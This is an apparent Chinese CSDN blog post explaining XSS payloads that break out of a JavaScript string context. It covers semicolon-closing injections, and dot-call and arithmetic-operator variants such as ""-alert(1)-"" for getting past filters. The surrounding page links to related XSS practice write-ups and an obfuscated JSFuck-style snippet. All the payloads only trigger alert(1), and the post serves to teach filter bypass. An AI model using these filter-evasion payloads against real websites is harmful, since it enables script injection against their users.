““-alert(1)-““执行的简单分析

已于 2022-10-07 17:49:24 修改
阅读量888 收藏 5
点赞数
分类专栏: 渗透测试 文章标签: 网络安全
于 2022-07-13 23:15:25 首次发布
原文链接:http://t.zoukankan.com/mkdd-p-12977098.html
版权
本文详细探讨了XSS(跨站脚本)漏洞的利用方式,包括通过分号、点号进行闭合的常见思路,以及在分号和点号被过滤时如何利用中划线和其他数学运算符进行代码注入。这些技巧揭示了XSS攻击者如何在不同过滤条件下寻找绕过策略,为安全防护提供了深入的理解。
摘要由CSDN通过智能技术生成

漏洞场景

如下所示的XSS位置,绿色部分表示用户可控

<script>id="xsspoint";</script>

常见思路

最常用的闭合方式就是输入";alert(1);",那么代码就变成如下,

<script>id="";alert(1);"";</script>

也可以输入";alert(1);//,效果一样

<script>id="";alert(1);//";</script>

过滤分号的场景

问题来了,如果过滤了分号怎么办?一种办法是利用点号,取字符的a函数,把要执行的js代码作为入参放在a函数中,即使a函数是不存在函数,js也会先执行其中的入参,payload如下

<script>"".a(alert(1))//";</script>

过滤分号、点号的场景

问题又来了,如果过滤了分号还过滤了点号甚至还过滤了反斜杠咋办?这里介绍一个今天才理解的思路——用中划线

<script>""-alert(1)-”";</script>

中划线就是减号! 也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算~

因此除了减号,其他数学运算符号和位运算符号,也都是阔以的,后面绕过XSS的思路就更多了

<script>""+alert(1)+"";</script>
<script>""/alert(1)/"";</script>
<script>""%alert(1)%"";</script>
<script>""*alert(1)*"";</script>
<script>""^alert(1)^"";</script>
<script>"">>alert(1)>>"";</script>
<script>""<<alert(1)<<"";</script>
<script>""<alert(1)<"";</script>
<script>"">alert(1)>"";</script>
<script>""==alert(1)=="";</script>

「已注销」
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
alert(1) (haozi.me)靶场练习
weixin_49472648的博客
07-29 644
如果此框也用于显示服务器端回传的内容,即使将html代码段插入textarea,html代码段不会执行,仅仅将其作为普通文本显示。在html中语句是不区分大小写的,但在js中语句是严格区分大小写的,标签中的alert函数是js解析,所以需要对alert进行编码,采用实体编码。采用a标签,实体编码绕过script的过滤,url编码绕过大写,点击链接的进行触发。中的内容不会有脚本执行,仅仅将其作为普通文本显示,所以需要进行闭合绕过处理。这个字符通过大写可以转换为S,并且在html中是不区分大小写的。......
黑客利用js--alert(1)
墨尔本,晴
03-14 362
Javascript代码 [code="java"]($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_) ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/...
【20171025早】alert(1) to win 练习
weixin_30672295的博客
10-25 158
本人黑绝楼,自称老黑,男,25岁,曾经在BAT工作过两年,但是一直都是底层人员,整天做重复性工作,甚敢无趣,曾和工作十年之久的同事聊天,发现对方回首过往,生活是寡淡如水,只有机械性工作。旋即老黑毅然决然辞职,现赋闲在家,打算从软件开发工程师转为安全研究,开这个博客记录平生,以飨各位看官。 老黑我无房,无车,无女友,身高一米七七,微胖,为计算机奋斗了四五年,可惜进步甚微,现决心发愤图强,在...
alert(1) zz
weixin_34289744的博客
09-21 119
发信人: zhuxf (言乍古月), 信区: WebGeeks标  题: alert(1) zz发信站: 水木社区 (Tue Sep 20 10:10:07 2011), 站内在2011年的BlackHat DC 2011大会上Ryan Barnett给出了一段关于XSS的示例javascript代码:Javascript代码  收藏代码    ($=[$=[]][(__=!$+$)[_=-~-~...
alert(1) to win
weixin_30834019的博客
12-28 539
一、 function escape(s) { return '<script>console.log("'+s+'");</script>'; } 两种思路:1、结束 console.log,然后执行 alert(1);2、直接让 alert(1) 在console.log()中执行。 结束 console.log 1、payload:");ale...
ucraft-alert-bot
06-19
为了部署和运行"Ucraft Alert Bot",你需要安装Node.js环境,然后在项目根目录下执行`npm install`来安装所有依赖。接着,根据`README.md`中的指示配置`config.js`或`.env`文件,设置你的电子邮件服务器信息和警报...
Amazon-Price-Alert:检查亚马逊商品的价格下降
03-31
Python是一种广泛应用于数据分析、Web开发和自动化任务的语言,它的简洁性和丰富的库使得处理网络数据变得简单。在这个项目中,我们将主要依赖以下几个Python库: 1. **BeautifulSoup**:这是一个用于解析HTML和XML...
3070-restock-alert:3070退货时通过电子邮件通知您
02-28
1. **数据抓取**:首先,系统需要定期从目标电商网站抓取商品库存信息。这通常通过网络爬虫技术实现,使用JavaScript的HTTP库,如axios或fetch,来发送请求并获取HTML页面内容。 2. **页面解析**:获取到的HTML页面...
spark-alarm:Apache Spark 的警报和监控工具
05-31
Spark-Alarm 项目简介提供一些基本的报警手段,并可以通过SparkListener实现对Spark内部执行逻辑进行监控报警报警模式使用限制简介邮件通用,无限制通过 SMTP 协议发送告警哨兵网易内部使用通过 HTTP 协议发送告警...
prometheus-2.29.1.windows-amd64.zip
08-20
1. **prometheus.exe**:Prometheus 服务器的可执行文件,用于运行监控实例。 2. **config.yml**:默认配置文件,用户可以在此修改监控设置,如目标发现、数据保留策略等。 3. **promtool.exe**:Prometheus 工具集...
alert(1) to win 7
weixin_30629653的博客
01-03 225
function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; ...
一段有趣的Javascript代码及分析
iteye_1858的博客
03-08 317
在2011年的BlackHat DC 2011大会上Ryan Barnett给出了一段关于XSS的示例javascript代码: [code="javascript"] ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_) [/cod...
);alert(1);//','17491847');return false;
u013203974的专栏
12-25 242
alert(1) to win部分解题
weixin_30553777的博客
08-03 279
XSS在线习题分析 (https://alf.nu/alert1) 1. Warmup function escape(s) { return '<script>console.log("'+s+'");</script>'; } 没有进行过滤,只需要语句闭合就行。闭合语句思路:把console.log() 单独作为一个语句,alert(1)单独作为一个语句,包含...
title');alert('1');//
iteye_7901的博客
10-29 108
aaaaa
<h1>测试博客</h1><script type="text/javascript">alert(1);</script>
bbbb
09-25 611
测试文章002 测试文章002 测试文章002测试文章002 测试文章002 测试文章002点击打开链接:http://write.blog.csdn.net/postedit
alert(1) to win】不完全攻略
ajxi63204的博客
05-24 502
alert(1) to win 一个练习XSS的平台,地址:https://alf.nu/alert1 Warmup 给出了一段JavaScript代码 function escape(s) { return '<script>console.log("'+s+'");</script>'; } 对s没有任何校验,payload为 ...
通过alert(1&&2)==2 alert(1||2)==1深入理解逻辑运算符||和&&
weixin_30800807的博客
07-13 170
alert(1&&2)==2 alert(1||2)==1 我们对逻辑与(&&)和逻辑或(||)的认识是对于 && 是全真为真对于 || 是一真为真看到上面的 1&&2 ==2就蒙了应该这样计算 先来说说 ||(逻辑或), 从字面上来说,只有前后都是 false 的时候才返回 false,否则返回 true。 ...
springmvc项目中XSS漏洞解决
laok186的博客
08-01 1952
反射型XSS漏洞修复
请自行实践1-2个JavaScript代码片段,可以参考案例编写或借鉴教材及网络资源。简要分析其功能与代码实现。
最新发布
06-08
以下是两个简单的 JavaScript 代码片段: 1. 计数器效果 该代码片段实现了一个简单的计数器效果,点击“增加”按钮可以将计数器的值增加1,点击“减少”按钮可以将计数器的值减少1。代码如下: ``` let count = 0; let countElement = document.querySelector("#count"); function increment() { count++; countElement.innerHTML = count; } function decrement() { count--; countElement.innerHTML = count; } let addButton = document.querySelector("#addButton"); addButton.addEventListener("click", increment); let minusButton = document.querySelector("#minusButton"); minusButton.addEventListener("click", decrement); ``` 该代码片段使用了 DOM 操作,通过获取页面中的元素来实现增加和减少计数器的功能。具体来说,代码中定义了一个变量 `count` 来保存计数器的值,以及一个变量 `countElement` 来获取页面中用于显示计数器值的元素。同时,定义了两个函数 `increment()` 和 `decrement()`,分别用于增加和减少计数器的值,并将值更新到页面中。最后,使用 `addEventListener()` 方法来将增加和减少按钮的点击事件与相应的函数绑定起来。 2. 简单的表单验证 该代码片段实现了一个简单的表单验证功能,当用户提交表单时,会检查表单中的输入是否符合要求。如果输入不符合要求,则会提示用户重新输入。代码如下: ``` let form = document.querySelector("#myForm"); form.addEventListener("submit", function(event) { let nameInput = form.querySelector("#nameInput"); let emailInput = form.querySelector("#emailInput"); if (nameInput.value.trim() === "") { alert("请输入姓名!"); event.preventDefault(); } if (emailInput.value.trim() === "" || !emailInput.value.includes("@")) { alert("请输入有效的邮箱地址!"); event.preventDefault(); } }); ``` 该代码片段使用了表单事件,当用户提交表单时,会触发 `submit` 事件,并执行相应的函数。函数中通过获取表单中的输入元素,并使用 `value` 属性获取输入的值。之后,通过一些简单的判断条件来检查输入是否符合要求,如果不符合,则会弹出提示框,并使用 `event.preventDefault()` 方法阻止表单的提交。 总的来说,这两个代码片段都是非常简单的 JavaScript 示例,但它们都涉及到了常见的 JavaScript 特性和技巧,对于初学者来说是很好的练习素材。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值